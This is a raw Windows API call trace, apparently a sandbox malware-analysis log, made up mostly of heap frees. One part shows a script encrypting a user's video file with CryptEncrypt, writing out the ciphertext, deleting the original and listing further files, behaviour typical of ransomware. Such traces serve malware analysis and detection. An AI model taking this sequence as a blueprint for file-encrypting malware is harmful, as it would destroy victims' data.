HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0100.498] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0100.498] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0100.498] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0100.498] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: hHeap=0x1780000) returned 1 [0100.498] CryptGetKeyParam (in: hKey=0x41ac2c0, dwParam=0x7, pbData=0x43e28c0, pdwDataLen=0x144e008, dwFlags=0x0 | out: pbData=0x43e28c0*=0x6610, pdwDataLen=0x144e008*=0x4) returned 1 [0100.498] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0100.498] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0100.498] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0100.498] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0100.498] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0100.498] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0100.498] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0100.498] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0100.498] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0100.498] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0100.498] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0100.498] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0100.498] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0100.498] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0100.498] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0100.498] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0100.499] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0100.499] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0100.499] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0100.499] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0100.499] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0100.499] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0100.499] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0100.499] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0058 | out: hHeap=0x1780000) returned 1 [0100.499] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0100.499] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0100.499] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0100.499] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0100.499] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0100.499] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0100.499] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0100.499] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0100.499] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0100.499] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0100.499] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0100.499] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0100.499] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0100.499] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0100.499] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0100.499] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0100.499] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0100.499] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0100.499] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797028 | out: hHeap=0x1780000) returned 1 [0100.499] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0100.499] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0100.499] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0100.499] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0100.500] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0100.500] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0100.500] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0100.500] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0100.500] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0100.500] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0100.500] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0100.500] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea0b8 | out: hHeap=0x1780000) returned 1 [0100.500] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0100.500] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0100.500] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0100.500] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0100.500] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9a40 | out: hHeap=0x1780000) returned 1 [0100.500] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0100.500] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0100.500] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0100.500] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0100.500] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0100.500] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0100.500] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0100.500] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0100.500] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0100.500] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0100.500] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0100.500] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0100.500] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0100.500] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0100.500] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0100.500] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0100.500] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0100.501] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0100.501] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0100.501] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0100.501] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0238 | out: hHeap=0x1780000) returned 1 [0100.501] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0100.501] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac280 | out: hHeap=0x1780000) returned 1 [0100.501] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0100.501] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0100.501] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0100.501] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0100.501] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0100.501] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0100.501] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2728 | out: hHeap=0x1780000) returned 1 [0100.501] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0100.501] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0100.501] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0100.501] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0100.501] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0100.501] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0100.502] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0100.502] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43caa18, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0100.502] CryptEncrypt (in: hKey=0x41ac2c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e538*=0x400f, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e538*=0x4010) returned 1 [0100.502] CharLowerBuffW (in: lpsz="byte[16401]", cchLength=0xb | out: lpsz="byte[16401]") returned 0xb [0100.502] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0100.502] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0100.502] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0100.502] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43ca7c0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0100.502] CryptEncrypt (in: hKey=0x41ac2c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4522058*, pdwDataLen=0x144e538*=0x400f, dwBufLen=0x4010 | out: pbData=0x4522058*, pdwDataLen=0x144e538*=0x4010) returned 1 [0100.560] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0100.560] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0100.560] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0100.560] WriteFile (in: hFile=0x298, lpBuffer=0x451a028*, nNumberOfBytesToWrite=0x4010, lpNumberOfBytesWritten=0x144ef3c, lpOverlapped=0x0 | out: lpBuffer=0x451a028*, lpNumberOfBytesWritten=0x144ef3c*=0x4010, lpOverlapped=0x0) returned 1 [0100.562] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0100.562] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0100.562] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0100.562] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0100.562] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca598, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0100.562] CryptDestroyKey (hKey=0x41ac2c0) returned 1 [0100.562] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0100.562] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0100.562] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0100.562] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0100.562] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0100.562] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0100.562] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0100.562] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0100.562] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0100.562] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0100.562] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796fe8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0100.562] CryptReleaseContext (hProv=0x41a5360, dwFlags=0x0) returned 1 [0100.562] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0100.563] FreeLibrary (hLibModule=0x756e0000) returned 1 [0100.563] CloseHandle (hObject=0x258) returned 1 [0100.563] CloseHandle (hObject=0x298) returned 1 [0100.571] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\wJA95KXdyH.flv", nBufferLength=0x7fff, lpBuffer=0x143ef38, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\wJA95KXdyH.flv", lpFilePart=0x0) returned 0x34 [0100.571] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\wJA95KXdyH.flv" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\wja95kxdyh.flv")) returned 0x20 [0100.572] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0100.572] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2400 [0100.572] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c98 [0100.572] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2390 [0100.572] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0100.572] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0100.572] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0100.572] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0100.572] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\wJA95KXdyH.flv", lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d4304b0, ftCreationTime.dwHighDateTime=0x1d5ead7, ftLastAccessTime.dwLowDateTime=0xed3a4300, ftLastAccessTime.dwHighDateTime=0x1d5e933, ftLastWriteTime.dwLowDateTime=0xed3a4300, ftLastWriteTime.dwHighDateTime=0x1d5e933, nFileSizeHigh=0x0, nFileSizeLow=0x400f, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="wJA95KXdyH.flv", cAlternateFileName="WJA95K~1.FLV")) returned 0x41ac540 [0100.572] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\wJA95KXdyH.flv" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\wja95kxdyh.flv")) returned 1 [0100.629] FindNextFileW (in: hFindFile=0x41ac540, lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d4304b0, ftCreationTime.dwHighDateTime=0x1d5ead7, ftLastAccessTime.dwLowDateTime=0xed3a4300, ftLastAccessTime.dwHighDateTime=0x1d5e933, ftLastWriteTime.dwLowDateTime=0xed3a4300, ftLastWriteTime.dwHighDateTime=0x1d5e933, nFileSizeHigh=0x0, nFileSizeLow=0x400f, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="wJA95KXdyH.flv", cAlternateFileName="WJA95K~1.FLV")) returned 0 [0100.629] FindClose (in: hFindFile=0x41ac540 | out: hFindFile=0x41ac540) returned 1 [0100.629] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a500 | out: hHeap=0x1780000) returned 1 [0100.629] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2360 | out: hHeap=0x1780000) returned 1 [0100.629] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0100.629] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0100.629] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431d8c0 | out: hHeap=0x1780000) returned 1 [0100.629] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0100.629] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ba8 | out: hHeap=0x1780000) returned 1 [0100.629] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bc0 | out: hHeap=0x1780000) returned 1 [0100.629] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf428 | out: hHeap=0x1780000) returned 1 [0100.629] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0100.629] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac500 | out: hHeap=0x1780000) returned 1 [0100.629] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0100.629] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0100.629] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e18 | out: hHeap=0x1780000) returned 1 [0100.629] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0100.629] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c38 | out: hHeap=0x1780000) returned 1 [0100.629] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0100.629] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf400 | out: hHeap=0x1780000) returned 1 [0100.629] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d10 | out: hHeap=0x1780000) returned 1 [0100.629] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0100.630] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf360 | out: hHeap=0x1780000) returned 1 [0100.630] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x19e5a98 | out: hHeap=0x1780000) returned 1 [0100.630] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0100.630] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0100.630] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0100.630] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf388 | out: hHeap=0x1780000) returned 1 [0100.630] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0100.630] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac200 | out: hHeap=0x1780000) returned 1 [0100.630] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0100.630] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac440 | out: hHeap=0x1780000) returned 1 [0100.630] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0100.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2400 [0100.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0100.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a80 [0100.630] CharUpperBuffW (in: lpsz="_FILELISTTOARRAY", cchLength=0x10 | out: lpsz="_FILELISTTOARRAY") returned 0x10 [0100.630] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a80 | out: hHeap=0x1780000) returned 1 [0100.630] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0100.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf360 [0100.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2410 [0100.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0100.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0100.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24e0 [0100.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9da0 [0100.630] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0100.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2450 [0100.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b90 [0100.630] 